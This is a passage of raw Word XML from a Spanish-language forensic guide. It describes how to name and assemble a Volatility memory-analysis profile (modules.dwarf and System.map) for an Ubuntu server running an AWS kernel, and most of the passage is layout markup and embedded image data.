                <v:shape id="_x0000_s1078" type="#_x0000_t202" style="position:absolute;left:30881;top:9575;width:25070;height:6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fOmyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NSgMx&#10;EL4LvkMYwYvYxLrUdm1aSlHQXoprL96GzXSzupksSbZd394Igsf5/me5Hl0nThRi61nD3USBIK69&#10;abnRcHh/vp2DiAnZYOeZNHxThPXq8mKJpfFnfqNTlRqRQziWqMGm1JdSxtqSwzjxPXHmjj44TPkM&#10;jTQBzzncdXKq1Ew6bDk3WOxpa6n+qganYV987O3NcHzabYr78HoYtrPPptL6+mrcPIJINKZ/8Z/7&#10;xeT5avqwKAo1X8DvTxkAufoBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAARnzpskAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0BA463E2" w14:textId="0D5E2FE4" w:rsidR="00A54B94" w:rsidRPr="003558B9" w:rsidRDefault="00A54B94" w:rsidP="00A54B94">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>18</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="54" w:name="_Toc155782585"/>
                        <w:r w:rsidRPr="00117088">
                          <w:t>Instalación de dwarfdump, Python 2.7, pip, Volatility 2.6 y sus librerías correctamente instaladas en el Ubuntu Server con kernel AWS.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="54"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ahora procederemos a nombrar el perfil de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ello vamos a generar un archivo zip, este archivo, como norma general, usaremos los valores de </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lsb_release -si</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>uname -r</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. De esta manera nombraremos de manera correcta el perfil de volatility para después no tengamos problemas al importarlo dentro de la máquina donde estamos realizando la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DB4FA" w14:textId="68AB3799" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este archivo zip, debe de contener los dos archivos necesarios de perfil:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6F957B" w14:textId="455A593C" w:rsidR="009B1250" w:rsidRPr="00BF6EEB" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modules.dwarf</w:t>
      </w:r>
      <w:r w:rsidR="00BF6EEB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85B770" w14:textId="7C3F92F9" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este archivo se genera a partir de los módulos del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Linux y contiene información sobre las estructuras de datos del kernel. Es creado usando, en nuestro caso, la herramienta dwarfdump sobre módulos del kernel compilados con símbolos de depuración. El archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidR="007B11B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.dwarf</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es crucial porque contiene los offsets y las definiciones de las estructuras de datos internas del kernel, lo que permite a Volatility entender cómo están organizados los datos en el volcado de memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D83A71" w14:textId="38257989" w:rsidR="009B1250" w:rsidRPr="00BF6EEB" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/boot/System.map-4.15.0-1021-aws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A224DA6" w14:textId="196AE853" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="00BD1378" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49EA0ECD" wp14:editId="02820911">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1128533</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5400731" cy="819150"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1687141320" name="Grupo 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400731" cy="819150"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5400731" cy="819150"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1378505250" name="Imagen 8" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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2739390" cy="819150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="635236431" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2863906" y="370935"/>
                            <a:ext cx="2536825" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2A2CB9B0" w14:textId="76912146" w:rsidR="00CD44B8" w:rsidRPr="00AA6F73" w:rsidRDefault="00CD44B8" w:rsidP="00CD44B8">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>19</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="55" w:name="_Toc155782586"/>
                              <w:r w:rsidRPr="000D65CC">
                                <w:t>Nombre de perfil.</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EA0ECD" id="Grupo 9" o:spid="_x0000_s1079" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:88.85pt;width:425.25pt;height:64.5pt;z-index:251729920;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="54007,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